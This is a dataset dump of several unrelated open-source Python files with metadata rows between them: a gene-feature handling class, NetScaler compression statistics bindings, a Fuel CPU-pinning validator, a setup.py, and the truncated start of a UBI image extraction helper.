Note that if there is no flag (the "isFlagged()" function returns
False) then an empty set will be returned.
"""
# Make a new (empty) RNASeqData object
feature_subset = FeatureSet()
# Populate with only the matching features
for feature in self.features:
if feature.flag == matchFlag:
feature_subset.addFeature(feature)
return feature_subset
def filterByTSS(self,limit1,limit2,exclude_limits=False):
"""Return a subset of features filtered by TSS position
Returns a new FeatureSet object containing only the features
from the current object where the TSS positions fall within a
region defined by upper and lower limits.
limits can be supplied in either order (i.e. highest/lowest
or lowest/highest).
If exclude_limits is False (the default) then TSS positions
that fall exactly on one of the boundaries are counted as
being within the region; if it is True then these TSS
positions will not be considered to lie inside the region.
"""
# Sort out upper and lower limits
if limit1 > limit2:
upper,lower = limit1,limit2
else:
upper,lower = limit2,limit1
# Make a new (empty) FeatureSet object
feature_subset = FeatureSet()
# Populate with only the matching features
for feature in self.features:
TSS = feature.getTSS()
if exclude_limits:
if lower < TSS and TSS < upper:
feature_subset.addFeature(feature)
else:
if lower <= TSS and TSS <= upper:
feature_subset.addFeature(feature)
return feature_subset
def sortByDistanceFrom(self,position):
"""Sort the features into order based on distance from a position
Sorts the features into order of absolute distance of
their TSS to the specified position (closest first).
Note that this operates on the current object.
"""
self.features = sorted(self.features,
key=lambda record:
abs(record.getTSS()-position))
return self
def sortByClosestEdgeTo(self,position1,position2=None):
"""Sort the features into order based on closest edge (TSS or TES)
Sorts the features into order of smallest absolute distance
to the specified position (closest first), considering both TSS
and TES, using the getClosestEdgeDistanceTo method of the
Feature class.
Note that this operates on the current object.
"""
self.features = sorted(self.features,
key=lambda record:
record.getClosestEdgeDistanceTo(position1,
position2))
return self
def sortByClosestTSSTo(self,position1,position2=None):
"""Sort the features into order based on closest edge to TSS
Sorts the features into order of smallest absolute distance
to the specified position (closest first) to the TSS position,
using the getClosestTSSDistanceTo method of the Feature class.
Note that this operates on the current object.
"""
self.features = sorted(self.features,
key=lambda record:
record.getClosestTSSDistanceTo(position1,
position2))
return self
def isFlagged(self):
"""Check whether feature data includes flags
Checks whether all the Feature records also have a valid flag
associated with them - if yes then returns True (indicating the
dataset as a whole is flagged), otherwise returns False.
"""
# Check all data and look for any None flags
for feature in self.features:
if feature.flag is None:
return False
# All flags valid
return True
def __iter__(self):
return iter(self.features)
def __getitem__(self,key):
try:
start = key.start
stop = key.stop
step = key.step
slice_ = FeatureSet()
for feature in self.features[start:stop:step]:
slice_.addFeature(feature)
return slice_
except AttributeError:
return self.features[key]
def __len__(self):
return len(self.features)
def __eq__(self,other):
if len(self) != len(other):
return False
for f1,f2 in zip(self,other):
if f1 != f2:
return False
return True
def __ne__(self,other):
if len(self) != len(other):
return True
for f1,f2 in zip(self,other):
if f1 != f2:
return True
return False
class Feature(object):
"""Class for storing an 'feature' (gene/transcript/isomer)
Access the data for the feature using the object's properties:
id
chrom
start
end
strand
tss
tes
A feature can also have the following optional data
associated with it:
- A source file name, which is set via the 'source_file'
keyword and accessed via the 'source_file' property.
It will be None if no filename has been specified.
There are also convenience methods (getTSS, getTES, getPromoterRegion)
and methods for calculating various distances.
"""
def __init__(self,feature_id,chrom,start,end,strand,source_file=None):
self.id = feature_id
self.chrom = chrom
self.start = int(start)
self.end = int(end)
self.strand = strand
self.flag = None
self.source_file = source_file
# Set the TSS and TES
if self.strand == '+':
self.tss = self.start
self.tes = self.end
elif self.strand == '-':
self.tss = self.end
self.tes = self.start
else:
raise Exception("Bad strand: '%s'" % self.strand)
def __repr__(self):
items = [self.id,
self.chrom,
str(self.start),
str(self.end),
self.strand]
if self.flag != None:
items.append(str(self.flag))
return '\t'.join(items)
def __eq__(self,other):
return \
(self.id == other.id) and \
(self.strand == other.strand) and \
(self.start == other.start) and \
(self.end == other.end)
def __ne__(self,other):
return \
(self.id != other.id) or \
(self.strand != other.strand) or \
(self.start != other.start) or \
(self.end != other.end)
def getTSS(self):
"""Return the TSS coordinate
TTS (transcription start site) is the start position for a +ve
strand, or end for a -ve strand.
This is a wrapper for accessing the 'tss' property.
"""
return self.tss
def getTES(self):
"""Return the TES coordinate
TES (transcription end site) is the start position for a +ve
strand, or end for a -ve strand.
This is a wrapper for accessing the 'tes' property.
"""
return self.tes
def containsPosition(self,coordinate):
"""Check whether a coordinate is within the gene coordinates
Returns True if coordinate lies within start and end, False
otherwise.
"""
return (self.start <= coordinate and coordinate <= self.end)
def getClosestTSSDistanceTo(self,position1,position2=None,
zero_inside_region=False):
"""Return distance from TSS to a coordinate or region
For a single specified position, return the absolute distance
between the position and the TSS.
If a second position is given (specifying a region) then return
smallest absolute distance of (TSS,position1) and (TSS,position2).
By default there is no special treatment when the TSS lies inside
the region specified by two positions; to return zero distance in
these cases, set the 'zero_inside_region' argument to True.
"""
return closestDistanceToRegion(self.getTSS(),
position1,position2,
zero_inside_region)
def getClosestTESDistanceTo(self,position1,position2=None,
zero_inside_region=False):
"""Return distance from TES to a coordinate or region
For a single specified position, return the absolute distance
between the position and the TES.
If a second position is given (specifying a region) then return
smallest absolute distance of (TES,position1) and (TES,position2).
By default there is no special treatment when the TES lies inside
the region specified by two positions; to return zero distance in
these cases, set the 'zero_inside_region' argument to True.
"""
return closestDistanceToRegion(self.getTES(),
position1,position2,
zero_inside_region)
def getClosestEdgeDistanceTo(self,position1,position2=None,
zero_inside_region=False):
"""Return closest edge distance to a coordinate or region
For a single specified position, the closest edge is whichever
of the TSS or TES is nearest (smallest absolute distance) from
that position i.e. the smallest distance of (TSS,position) and
(TES,position).
If a second position is given (specifying a region) then
the closest edge is whichever of the TSS/TES is closest to
either position1 or position2 i.e. the smallest distance of
(TSS,position1), (TES,position1), (TSS,position2) and
(TES,position2).
By default there is no special treatment when either the TSS
or TES lie inside the region specified by two positions; to
set this to zero, set the 'zero_inside_region' argument to
True.
"""
return min(self.getClosestTSSDistanceTo(position1,
position2,
zero_inside_region),
self.getClosestTESDistanceTo(position1,
position2,
zero_inside_region))
def getPromoterRegion(self,to_TSS,from_TSS):
"""Return the coordinates of the promoter region
The promoter region is a region of coordinates around the
TSS of a gene, defined by the supplied distances 'to_TSS'
(the distance downstream from the TSS) and 'from_TSS' (the
distance upstream from the TSS).
Returns a tuple containing the start and end coordinates
defining the promoter region.
"""
if self.strand == '+':
return (self.getTSS() - to_TSS,
self.getTSS() + from_TSS)
else:
return (self.getTSS() + to_TSS,
self.getTSS() - from_TSS)
|
artistic-2.0
| -4,439,065,279,214,473,700
| 36.087719
| 77
| 0.553716
| false
| 4.833841
| false
| false
| false
|
mahabs/nitro
|
nssrc/com/citrix/netscaler/nitro/resource/stat/cmp/cmp_stats.py
|
1
|
23212
|
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class cmp_stats(base_resource) :
def __init__(self) :
self._clearstats = ""
self._delbwsaving = 0
self._delcmpratio = 0
self._decomptcpratio = 0
self._decomptcpbandwidthsaving = 0
self._comptcpratio = 0
self._comptcpbandwidthsaving = 0
self._comptotaldatacompressionratio = 0
self._comphttpbandwidthsaving = 0
self._compratio = 0
self._comptotalrequests = 0
self._comprequestsrate = 0
self._comptotalrxbytes = 0
self._comprxbytesrate = 0
self._comptotaltxbytes = 0
self._comptxbytesrate = 0
self._comptotalrxpackets = 0
self._comprxpacketsrate = 0
self._comptotaltxpackets = 0
self._comptxpacketsrate = 0
self._comptcptotalrxbytes = 0
self._comptcprxbytesrate = 0
self._comptcptotalrxpackets = 0
self._comptcprxpacketsrate = 0
self._comptcptotaltxbytes = 0
self._comptcptxbytesrate = 0
self._comptcptotaltxpackets = 0
self._comptcptxpacketsrate = 0
self._comptcptotalquantum = 0
self._comptcpquantumrate = 0
self._comptcptotalpush = 0
self._comptcppushrate = 0
self._comptcptotaleoi = 0
self._comptcpeoirate = 0
self._comptcptotaltimer = 0
self._comptcptimerrate = 0
self._decomptcprxbytes = 0
self._decomptcprxbytesrate = 0
self._decomptcprxpackets = 0
self._decomptcprxpacketsrate = 0
self._decomptcptxbytes = 0
self._decomptcptxbytesrate = 0
self._decomptcptxpackets = 0
self._decomptcptxpacketsrate = 0
self._decomptcperrdata = 0
self._decomptcperrdatarate = 0
self._decomptcperrlessdata = 0
self._decomptcperrlessdatarate = 0
self._decomptcperrmoredata = 0
self._decomptcperrmoredatarate = 0
self._decomptcperrmemory = 0
self._decomptcperrmemoryrate = 0
self._decomptcperrunknown = 0
self._decomptcperrunknownrate = 0
self._delcomptotalrequests = 0
self._delcomprequestsrate = 0
self._delcompdone = 0
self._delcompdonerate = 0
self._delcomptcprxbytes = 0
self._delcomptcprxbytesrate = 0
self._delcomptcptxbytes = 0
self._delcomptcptxbytesrate = 0
self._delcompfirstaccess = 0
self._delcompfirstaccessrate = 0
self._delcomptcprxpackets = 0
self._delcomptcprxpacketsrate = 0
self._delcomptcptxpackets = 0
self._delcomptcptxpacketsrate = 0
self._delcompbaseserved = 0
self._delcompbaseservedrate = 0
self._delcompbasetcptxbytes = 0
self._delcompbasetcptxbytesrate = 0
self._delcomperrbypassed = 0
self._delcomperrbypassedrate = 0
self._delcomperrbfilewhdrfailed = 0
self._delcomperrbfilewhdrfailedrate = 0
self._delcomperrnostoremiss = 0
self._delcomperrnostoremissrate = 0
self._delcomperrreqinfotoobig = 0
self._delcomperrreqinfotoobigrate = 0
self._delcomperrreqinfoallocfail = 0
self._delcomperrreqinfoallocfailrate = 0
self._delcomperrsessallocfail = 0
self._delcomperrsessallocfailrate = 0
@property
def clearstats(self) :
"""Clear the statsistics / counters.<br/>Possible values = basic, full.
"""
try :
return self._clearstats
except Exception as e:
raise e
@clearstats.setter
def clearstats(self, clearstats) :
"""Clear the statsistics / counters
"""
try :
self._clearstats = clearstats
except Exception as e:
raise e
@property
def delcompbasetcptxbytes(self) :
"""Number of basefile bytes transmitted by NetScaler.
"""
try :
return self._delcompbasetcptxbytes
except Exception as e:
raise e
@property
def comphttpbandwidthsaving(self) :
"""Bandwidth saving from TCP compression expressed as percentage.
"""
try :
return self._comphttpbandwidthsaving
except Exception as e:
raise e
@property
def comptcptotalpush(self) :
"""Number of times the NetScaler compresses data on receiving a TCP PUSH flag from the server. The PUSH flag ensures that data is compressed immediately without waiting for the buffered data size to reach the quantum size.
"""
try :
return self._comptcptotalpush
except Exception as e:
raise e
@property
def delcompfirstaccess(self) :
"""Total number of delta compression first accesses.
"""
try :
return self._delcompfirstaccess
except Exception as e:
raise e
@property
def delcompdone(self) :
"""Total number of delta compressions done by NetScaler.
"""
try :
return self._delcompdone
except Exception as e:
raise e
@property
def comptcptotalrxpackets(self) :
"""Total number of compressible packets received by NetScaler.
"""
try :
return self._comptcptotalrxpackets
except Exception as e:
raise e
@property
def delcomperrbypassed(self) :
"""Number of times delta-compression bypassed by NetScaler.
"""
try :
return self._delcomperrbypassed
except Exception as e:
raise e
@property
def decomptcptxpacketsrate(self) :
"""Rate (/s) counter for decomptcptxpackets.
"""
try :
return self._decomptcptxpacketsrate
except Exception as e:
raise e
@property
def delcompbasetcptxbytesrate(self) :
"""Rate (/s) counter for delcompbasetcptxbytes.
"""
try :
return self._delcompbasetcptxbytesrate
except Exception as e:
raise e
@property
def delbwsaving(self) :
"""Bandwidth saving from delta compression expressed as percentage.
"""
try :
return self._delbwsaving
except Exception as e:
raise e
@property
def comprequestsrate(self) :
"""Rate (/s) counter for comptotalrequests.
"""
try :
return self._comprequestsrate
except Exception as e:
raise e
@property
def comptotaltxbytes(self) :
"""Number of bytes the NetScaler sends to the client after compressing the response from the server.
"""
try :
return self._comptotaltxbytes
except Exception as e:
raise e
@property
def comptcpeoirate(self) :
"""Rate (/s) counter for comptcptotaleoi.
"""
try :
return self._comptcpeoirate
except Exception as e:
raise e
@property
def delcomptcptxbytes(self) :
"""Total number of delta-compressed bytes transmitted by NetScaler.
"""
try :
return self._delcomptcptxbytes
except Exception as e:
raise e
@property
def delcomperrreqinfoallocfail(self) :
"""Number of times requested basefile could not be allocated.
"""
try :
return self._delcomperrreqinfoallocfail
except Exception as e:
raise e
@property
def delcomperrbypassedrate(self) :
"""Rate (/s) counter for delcomperrbypassed.
"""
try :
return self._delcomperrbypassedrate
except Exception as e:
raise e
@property
def delcmpratio(self) :
"""Ratio of compressible data received to compressed data transmitted.If this ratio is one (uncmp:1.0) that means compression is disabled or we are not able to compress even a single compressible packet.
"""
try :
return self._delcmpratio
except Exception as e:
raise e
@property
def delcomprequestsrate(self) :
"""Rate (/s) counter for delcomptotalrequests.
"""
try :
return self._delcomprequestsrate
except Exception as e:
raise e
@property
def delcomperrreqinfotoobig(self) :
"""Number of times basefile request URL was too large.
"""
try :
return self._delcomperrreqinfotoobig
except Exception as e:
raise e
@property
def delcomptcprxpacketsrate(self) :
"""Rate (/s) counter for delcomptcprxpackets.
"""
try :
return self._delcomptcprxpacketsrate
except Exception as e:
raise e
@property
def decomptcperrmemory(self) :
"""Number of times memory failures occurred while decompressing.
"""
try :
return self._decomptcperrmemory
except Exception as e:
raise e
@property
def decomptcprxbytes(self) :
"""Total number of compressed bytes received by NetScaler.
"""
try :
return self._decomptcprxbytes
except Exception as e:
raise e
@property
def comptcptxpacketsrate(self) :
"""Rate (/s) counter for comptcptotaltxpackets.
"""
try :
return self._comptcptxpacketsrate
except Exception as e:
raise e
@property
def comptotaldatacompressionratio(self) :
"""Ratio of total HTTP data received to total HTTP data transmitted.
"""
try :
return self._comptotaldatacompressionratio
except Exception as e:
raise e
@property
def comprxbytesrate(self) :
"""Rate (/s) counter for comptotalrxbytes.
"""
try :
return self._comprxbytesrate
except Exception as e:
raise e
@property
def delcomperrsessallocfailrate(self) :
"""Rate (/s) counter for delcomperrsessallocfail.
"""
try :
return self._delcomperrsessallocfailrate
except Exception as e:
raise e
@property
def delcomptcptxpacketsrate(self) :
"""Rate (/s) counter for delcomptcptxpackets.
"""
try :
return self._delcomptcptxpacketsrate
except Exception as e:
raise e
@property
def comptcptotaleoi(self) :
"""Number of times the NetScaler compresses data on receiving End Of Input (FIN packet). When the NetScaler receives End Of Input (FIN packet), it compresses the buffered data immediately without waiting for the buffered data size to reach the quantum size.
"""
try :
return self._comptcptotaleoi
except Exception as e:
raise e
@property
def comptcppushrate(self) :
"""Rate (/s) counter for comptcptotalpush.
"""
try :
return self._comptcppushrate
except Exception as e:
raise e
@property
def decomptcperrmemoryrate(self) :
"""Rate (/s) counter for decomptcperrmemory.
"""
try :
return self._decomptcperrmemoryrate
except Exception as e:
raise e
@property
def decomptcperrunknownrate(self) :
"""Rate (/s) counter for decomptcperrunknown.
"""
try :
return self._decomptcperrunknownrate
except Exception as e:
raise e
@property
def comptcpbandwidthsaving(self) :
"""Bandwidth saving from TCP compression expressed as percentage.
"""
try :
return self._comptcpbandwidthsaving
except Exception as e:
raise e
@property
def decomptcperrmoredata(self) :
"""Number of times NetScaler received more data than declared by protocol.
"""
try :
return self._decomptcperrmoredata
except Exception as e:
raise e
@property
def delcompfirstaccessrate(self) :
"""Rate (/s) counter for delcompfirstaccess.
"""
try :
return self._delcompfirstaccessrate
except Exception as e:
raise e
@property
def comprxpacketsrate(self) :
"""Rate (/s) counter for comptotalrxpackets.
"""
try :
return self._comprxpacketsrate
except Exception as e:
raise e
@property
def comptotalrxbytes(self) :
"""Number of bytes that can be compressed, which the NetScaler receives from the server. This gives the content length of the response that the NetScaler receives from server.
"""
try :
return self._comptotalrxbytes
except Exception as e:
raise e
@property
def decomptcprxpacketsrate(self) :
"""Rate (/s) counter for decomptcprxpackets.
"""
try :
return self._decomptcprxpacketsrate
except Exception as e:
raise e
@property
def comptcpquantumrate(self) :
"""Rate (/s) counter for comptcptotalquantum.
"""
try :
return self._comptcpquantumrate
except Exception as e:
raise e
@property
def comptxbytesrate(self) :
"""Rate (/s) counter for comptotaltxbytes.
"""
try :
return self._comptxbytesrate
except Exception as e:
raise e
@property
def delcompbaseservedrate(self) :
"""Rate (/s) counter for delcompbaseserved.
"""
try :
return self._delcompbaseservedrate
except Exception as e:
raise e
@property
def decomptcptxbytes(self) :
"""Total number of decompressed bytes transmitted by NetScaler.
"""
try :
return self._decomptcptxbytes
except Exception as e:
raise e
@property
def comptcptxbytesrate(self) :
"""Rate (/s) counter for comptcptotaltxbytes.
"""
try :
return self._comptcptxbytesrate
except Exception as e:
raise e
@property
def delcomptcprxpackets(self) :
"""Number of delta-compressible packets received.
"""
try :
return self._delcomptcprxpackets
except Exception as e:
raise e
@property
def decomptcprxpackets(self) :
"""Total number of compressed packets received by NetScaler.
"""
try :
return self._decomptcprxpackets
except Exception as e:
raise e
@property
def comptcptotaltimer(self) :
"""Number of times the NetScaler compresses data on expiration of data accumulation timer. The timer expires if the server response is very slow and consequently, the NetScaler does not receive response for a certain amount of time. Under such a condition, the NetScaler compresses the buffered data immediately without waiting for the buffered data size to reach the quantum size.
"""
try :
return self._comptcptotaltimer
except Exception as e:
raise e
@property
def delcomperrnostoremissrate(self) :
"""Rate (/s) counter for delcomperrnostoremiss.
"""
try :
return self._delcomperrnostoremissrate
except Exception as e:
raise e
@property
def delcomperrbfilewhdrfailed(self) :
"""Number of times basefile could not be updated in NetScaler cache.
"""
try :
return self._delcomperrbfilewhdrfailed
except Exception as e:
raise e
@property
def decomptcperrmoredatarate(self) :
"""Rate (/s) counter for decomptcperrmoredata.
"""
try :
return self._decomptcperrmoredatarate
except Exception as e:
raise e
@property
def decomptcpbandwidthsaving(self) :
"""Bandwidth saving from TCP compression expressed as percentage.
"""
try :
return self._decomptcpbandwidthsaving
except Exception as e:
raise e
@property
def delcomperrsessallocfail(self) :
"""Number of times delta compression session could not be allocated.
"""
try :
return self._delcomperrsessallocfail
except Exception as e:
raise e
@property
def delcompbaseserved(self) :
"""Total number of basefile requests served by NetScaler.
"""
try :
return self._delcompbaseserved
except Exception as e:
raise e
@property
def compratio(self) :
"""Ratio of the compressible data received from the server to the compressed data sent to the client.
"""
try :
return self._compratio
except Exception as e:
raise e
@property
def decomptcptxbytesrate(self) :
"""Rate (/s) counter for decomptcptxbytes.
"""
try :
return self._decomptcptxbytesrate
except Exception as e:
raise e
@property
def decomptcperrlessdata(self) :
"""Number of times NetScaler received less data than declared by protocol.
"""
try :
return self._decomptcperrlessdata
except Exception as e:
raise e
@property
def comptcprxbytesrate(self) :
"""Rate (/s) counter for comptcptotalrxbytes.
"""
try :
return self._comptcprxbytesrate
except Exception as e:
raise e
@property
def comptxpacketsrate(self) :
"""Rate (/s) counter for comptotaltxpackets.
"""
try :
return self._comptxpacketsrate
except Exception as e:
raise e
@property
def comptcprxpacketsrate(self) :
"""Rate (/s) counter for comptcptotalrxpackets.
"""
try :
return self._comptcprxpacketsrate
except Exception as e:
raise e
@property
def comptotaltxpackets(self) :
"""Number of HTTP packets that the NetScaler sends to the client after compressing the response from the server.
"""
try :
return self._comptotaltxpackets
except Exception as e:
raise e
@property
def delcomptcptxbytesrate(self) :
"""Rate (/s) counter for delcomptcptxbytes.
"""
try :
return self._delcomptcptxbytesrate
except Exception as e:
raise e
@property
def delcomperrreqinfotoobigrate(self) :
"""Rate (/s) counter for delcomperrreqinfotoobig.
"""
try :
return self._delcomperrreqinfotoobigrate
except Exception as e:
raise e
@property
def decomptcprxbytesrate(self) :
"""Rate (/s) counter for decomptcprxbytes.
"""
try :
return self._decomptcprxbytesrate
except Exception as e:
raise e
@property
def decomptcperrdatarate(self) :
"""Rate (/s) counter for decomptcperrdata.
"""
try :
return self._decomptcperrdatarate
except Exception as e:
raise e
@property
def comptotalrequests(self) :
"""Number of HTTP compression requests the NetScaler receives for which the response is successfully compressed. For example, after you enable compression and configure services, if you send requests to the NetScaler with the following header information: "Accept-Encoding: gzip, deflate", and NetScaler compresses the corresponding response, this counter is incremented.
"""
try :
return self._comptotalrequests
except Exception as e:
raise e
@property
def decomptcperrunknown(self) :
"""Number of times unknown errors occurred while decompressing.
"""
try :
return self._decomptcperrunknown
except Exception as e:
raise e
@property
def comptotalrxpackets(self) :
"""Number of HTTP packets that can be compressed, which the NetScaler receives from the server.
"""
try :
return self._comptotalrxpackets
except Exception as e:
raise e
@property
def delcomptcprxbytes(self) :
"""Total number of delta-compressible bytes received by NetScaler.
"""
try :
return self._delcomptcprxbytes
except Exception as e:
raise e
@property
def comptcptimerrate(self) :
"""Rate (/s) counter for comptcptotaltimer.
"""
try :
return self._comptcptimerrate
except Exception as e:
raise e
@property
def comptcptotalquantum(self) :
"""Number of times the NetScaler compresses a quantum of data. NetScaler buffers the data received from the server till it reaches the quantum size and then compresses the buffered data and transmits to the client.
"""
try :
return self._comptcptotalquantum
except Exception as e:
raise e
@property
def comptcptotaltxpackets(self) :
"""Number of TCP packets that the NetScaler sends to the client after compressing the response from the server.
"""
try :
return self._comptcptotaltxpackets
except Exception as e:
raise e
@property
def delcompdonerate(self) :
"""Rate (/s) counter for delcompdone.
"""
try :
return self._delcompdonerate
except Exception as e:
raise e
@property
def delcomptcptxpackets(self) :
"""Total number of delta-compressed packets transmitted by NetScaler.
"""
try :
return self._delcomptcptxpackets
except Exception as e:
raise e
@property
def decomptcpratio(self) :
"""Ratio of decompressed data transmitted to compressed data received.
"""
try :
return self._decomptcpratio
except Exception as e:
raise e
@property
def decomptcperrlessdatarate(self) :
"""Rate (/s) counter for decomptcperrlessdata.
"""
try :
return self._decomptcperrlessdatarate
except Exception as e:
raise e
@property
def comptcptotalrxbytes(self) :
"""Number of bytes that can be compressed, which the NetScaler receives from the server. This gives the content length of the response that the NetScaler receives from server.
"""
try :
return self._comptcptotalrxbytes
except Exception as e:
raise e
@property
def delcomptcprxbytesrate(self) :
"""Rate (/s) counter for delcomptcprxbytes.
"""
try :
return self._delcomptcprxbytesrate
except Exception as e:
raise e
@property
def comptcptotaltxbytes(self) :
"""Number of bytes that the NetScaler sends to the client after compressing the response from the server.
"""
try :
return self._comptcptotaltxbytes
except Exception as e:
raise e
@property
def decomptcptxpackets(self) :
"""Total number of decompressed packets transmitted by NetScaler.
"""
try :
return self._decomptcptxpackets
except Exception as e:
raise e
@property
def delcomptotalrequests(self) :
"""Total number of delta compression requests received by NetScaler.
"""
try :
return self._delcomptotalrequests
except Exception as e:
raise e
@property
def delcomperrreqinfoallocfailrate(self) :
"""Rate (/s) counter for delcomperrreqinfoallocfail.
"""
try :
return self._delcomperrreqinfoallocfailrate
except Exception as e:
raise e
@property
def delcomperrbfilewhdrfailedrate(self) :
"""Rate (/s) counter for delcomperrbfilewhdrfailed.
"""
try :
return self._delcomperrbfilewhdrfailedrate
except Exception as e:
raise e
@property
def delcomperrnostoremiss(self) :
"""Number of times basefile was not found in NetScaler cache.
"""
try :
return self._delcomperrnostoremiss
except Exception as e:
raise e
@property
def comptcpratio(self) :
"""Ratio of compressible data received to compressed data transmitted.If this ratio is one (uncmp:1.0) that means compression is disabled or we are not able to compress even a single compressible packet.
"""
try :
return self._comptcpratio
except Exception as e:
raise e
@property
def decomptcperrdata(self) :
"""Number of data errors encountered while decompressing.
"""
try :
return self._decomptcperrdata
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(cmp_response, response, self.__class__.__name__.replace('_stats',''))
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.cmp
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
return None
except Exception as e :
raise e
@classmethod
def get(cls, service, name="", option_="") :
""" Use this API to fetch the statistics of all cmp_stats resources that are configured on netscaler.
"""
try :
obj = cmp_stats()
if not name :
response = obj.stat_resources(service, option_)
return response
except Exception as e:
raise e
class Clearstats:
basic = "basic"
full = "full"
class cmp_response(base_response) :
def __init__(self, length=1) :
self.cmp = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.cmp = [cmp_stats() for _ in range(length)]
|
apache-2.0
| 1,323,930,941,714,670,600
| 24.039914
| 384
| 0.721006
| false
| 3.227475
| false
| false
| false
|
pbasov/fuel-extension-cpu-pinning
|
fuel_extension_cpu_pinning/validators.py
|
1
|
1623
|
from fuel_extension_cpu_pinning.models import CpuPinOverride
from nailgun.api.v1.validators.base import BasicValidator
from nailgun.errors import errors
from nailgun.logger import logger
class CpuPinningValidator(BasicValidator):
schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"title": "CPU pinning for Nova and Contrail vrouter",
"description": "CPU cores masks",
"type": "object",
"properties": {
"nova_cores": {"type": "array"},
"vrouter_cores": {"type": "array"},
},
}
@classmethod
def validate(cls, data, node=None, pins_data=None):
"""Check input data for intersections
to ensure correct core bindings
"""
dict_data = cls.validate_json(data)
cls.validate_schema(dict_data, cls.schema)
api_nova_cores = dict_data.get('nova_cores', [])
api_vrouter_cores = dict_data.get('vrouter_cores', [])
db_nova_cores = pins_data.get('nova_cores') or []
db_vrouter_cores = pins_data.get('vrouter_cores') or []
if set(api_nova_cores) & set(api_vrouter_cores) != set():
raise errors.InvalidData('Input values conflict with each other')
if all(cores != [] for cores in (api_nova_cores, api_vrouter_cores)):
return dict_data
if any(condition != set() for condition in [
set(api_nova_cores) & set(db_vrouter_cores),
set(api_vrouter_cores) & set(db_nova_cores)]
):
raise errors.InvalidData('Input values conflict with existing one')
return dict_data
|
apache-2.0
| 5,613,233,836,513,574,000
| 36.744186
| 79
| 0.610598
| false
| 3.731034
| false
| false
| false
|
akvo/butler
|
setup.py
|
1
|
2525
|
# -*- coding: UTF-8 -*-
from distutils.command.install import INSTALL_SCHEMES
from distutils.core import setup
from setuptools import find_packages
import os
import re
import time
_version = "0.1.%sdev0" % int(time.time())
_packages = find_packages('butler', exclude=["*.tests", "*.tests.*", "tests.*", "tests"])
# make sure that data files go into the right place
# see http://groups.google.com/group/comp.lang.python/browse_thread/thread/35ec7b2fed36eaec/2105ee4d9e8042cb
for scheme in INSTALL_SCHEMES.values():
scheme['data'] = scheme['purelib']
# find any static content such as HTML files or CSS
_INCLUDE = re.compile("^.*\.(html|less|css|js|png|gif|jpg|mo|eot|svg|ttf|woff|otf|json|conf|txt|ico)$")
_root_directory='butler'
def get_package_data():
package_data = {}
for pkg in os.listdir(_root_directory):
pkg_path = os.path.join(_root_directory, pkg)
if os.path.isdir(pkg_path):
package_data[pkg] = create_paths(pkg_path)
return package_data
def create_paths(root_dir):
paths = []
is_package = os.path.exists(os.path.join(root_dir, '__init__.py'))
children = os.listdir(root_dir)
for child in children:
childpath = os.path.join(root_dir, child)
if os.path.isfile(childpath) and not is_package and _INCLUDE.match(child):
paths.append(child)
if os.path.isdir(childpath):
paths += [os.path.join( child, path ) for path in create_paths( os.path.join(root_dir, child) ) ]
return paths
_reqs_dir = os.path.join(os.path.dirname(__file__), 'requirements')
def _strip_comments(line):
return line.split('#', 1)[0].strip()
def _get_reqs(req):
with open(os.path.join( _reqs_dir, req ) ) as f:
requires = f.readlines()
requires = map(_strip_comments, requires)
requires = filter( lambda x:x.strip()!='', requires )
return requires
_install_requires = _get_reqs('common.txt')
_extras_require = {
'psql': _get_reqs('psql.txt'),
'mysql': _get_reqs('mysql.txt'),
}
_data_files = [('', ['requirements/%s' % reqs_file for reqs_file in os.listdir(_reqs_dir)])]
setup(
name='butler',
version=_version,
packages=_packages,
package_dir={'': 'butler'},
package_data=get_package_data(),
install_requires=_install_requires,
extras_require=_extras_require,
data_files=_data_files,
author='Akvo.org',
author_email='code@akvo.org',
url='https://github.com/akvo/akvo-butler',
license='Affero GPL',
)
|
agpl-3.0
| -8,536,758,986,645,435,000
| 27.693182
| 109
| 0.643564
| false
| 3.184111
| false
| false
| false
|
n3wb13/OpenNfrGui-5.0-1
|
lib/python/Plugins/Extensions/NFR4XBoot/ubi_reader/ui/common.py
|
5
|
3812
|
import os
from ubi_io import leb_virtual_file
from ubifs import ubifs, walk, output
from ubifs.defines import PRINT_UBIFS_KEY_HASH, PRINT_UBIFS_COMPR
from ubi.defines import PRINT_VOL_TYPE_LIST, UBI_VTBL_AUTORESIZE_FLG
output_dir = os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))), 'output')
def extract_files(ubifs, out_path, perms = False):
try:
inodes = {}
walk.index(ubifs, ubifs.master_node.root_lnum, ubifs.master_node.root_offs, inodes)
for dent in inodes[1]['dent']:
output.dents(ubifs, inodes, dent, out_path, perms)
except Exception as e:
import traceback
ubifs.log.write('%s' % e)
traceback.print_exc()
def get_ubi_params(ubi):
ubi_flags = {'min_io_size': '-m',
'max_bud_bytes': '-j',
'leb_size': '-e',
'default_compr': '-x',
'sub_page_size': '-s',
'fanout': '-f',
'key_hash': '-k',
'orph_lebs': '-p',
'log_lebs': '-l',
'max_leb_cnt': '-c',
'peb_size': '-p',
'sub_page_size': '-s',
'vid_hdr_offset': '-O',
'version': '-x',
'image_seq': '-Q',
'alignment': '-a',
'vol_id': '-n',
'name': '-N'}
ubi_params = {}
ubi_args = {}
ini_params = {}
for image in ubi.images:
img_seq = image.image_seq
ubi_params[img_seq] = {}
